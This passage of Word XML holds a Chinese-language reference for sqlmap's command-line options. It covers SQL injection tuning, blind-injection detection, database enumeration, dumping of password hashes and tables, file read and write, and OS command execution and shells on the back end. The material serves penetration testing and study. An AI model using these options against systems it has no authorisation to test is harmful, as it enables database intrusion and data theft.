    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-p TESTPARAMETER </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>可测试的参数（</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–dbms=DBMS </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>强制后端的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>DBMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>为此值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–os=OS </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>强制后端的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>DBMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>操作系统为这个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–prefix=PREFIX </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>字符串前缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–suffix=SUFFIX </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>字符串后缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–tamper=TAMPER </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>使用给定的脚本（</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）篡改注入数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00510092">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>（检测）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这些选项可以用来指定在</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>盲注时如何解析和比较</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>响应页面的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–level=LEVEL </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>执行测试的等级（</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>1-5</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>，默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–risk=RISK </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>执行测试的风险（</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>0-3</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>，默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–string=STRING </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>查询时有效时在页面匹配字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">–regexp=REGEXP </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>查询时有效时在页面匹配正则表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–text-only </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>仅基于在文本内容比较网页</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00B87B3C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>（技巧）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这些选项可用于调整具体的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>注入测试。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>–technique=TECH SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注入技术测试（默认</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>BEUST</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>–time-sec=TIMESEC DBMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>响应的延迟时间（默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>秒）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–union-cols=UCOLS </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>定列范围用于测试</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>查询注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–union-char=UCHAR </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>用于暴力猜解列数的字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00F41BAD">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Fingerprint</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>（指纹）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-f, –fingerprint </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>执行检查广泛的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>DBMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>版本指纹</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="005A503E">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>（枚举）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外，您还可以运行您自己</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-b, –banner </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>检索数据库管理系统的标识</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–current-user </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>检索数据库管理系统当前用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–current-db </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>检索数据库管理系统当前数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–is-dba </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>DBMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>当前用户是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>DBA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–users </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>枚举数据库管理系统用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">–passwords </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>枚举数据库管理系统用户密码哈希</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–privileges </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>枚举数据库管理系统用户的权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–roles </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>枚举数据库管理系统用户的角色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–dbs </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>枚举数据库管理系统数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–tables </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>枚举的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>DBMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>数据库中的表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–columns </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>枚举</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>DBMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>数据库表列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–dump </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>转储数据库管理系统的数据库中的表项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–dump-all </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>转储所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>DBMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>数据库表中的条目</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–search </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>搜索列（</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>），表（</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>或数据库名称（</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-D DB </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>要进行枚举的数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-T TBL </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>要进行枚举的数据库表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-C COL </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>要进行枚举的数据库列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">-U USER </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>用来进行枚举的数据库用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–exclude-sysdbs </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>枚举表时排除系统数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–start=LIMITSTART </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>第一个查询输出进入检索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–stop=LIMITSTOP </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>最后查询的输出进入检索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–first=FIRSTCHAR </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>第一个查询输出字的字符检索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–last=LASTCHAR </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>最后查询的输出字字符检索</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–sql-query=QUERY </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>要执行的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–sql-shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>提示交互式</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="005763D8">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:lastRenderedPageBreak/>
        <w:t>Brute force</w:t>
      </w:r>
      <w:r w:rsidR="005763D8">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="005763D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这些选项可以被用来运行蛮力检查。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–common-tables </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>检查存在共同表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–common-columns </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>检查存在共同列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User-defined function injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（用户自定义函数注入）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这些选项可以用来创建用户自定义函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–udf-inject </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注入用户自定义函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–shared-lib=SHLIB </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>共享库的本地路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File system access</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（访问文件系统）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这些选项可以被用来访问后端数据库管理系统的底层文件系统。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–file-read=RFILE </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>从后端的数据库管理系统文件系统读取文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–file-write=WFILE </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>编辑后端的数据库管理系统文件系统上的本地文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–file-dest=DFILE </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>后端的数据库管理系统写入文件的绝对路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operating system access</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（操作系统访问）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这些选项可以用于访问后端数据库管理系统的底层操作系统。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–os-cmd=OSCMD </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>执行操作系统命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–os-shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>交互式的操作系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
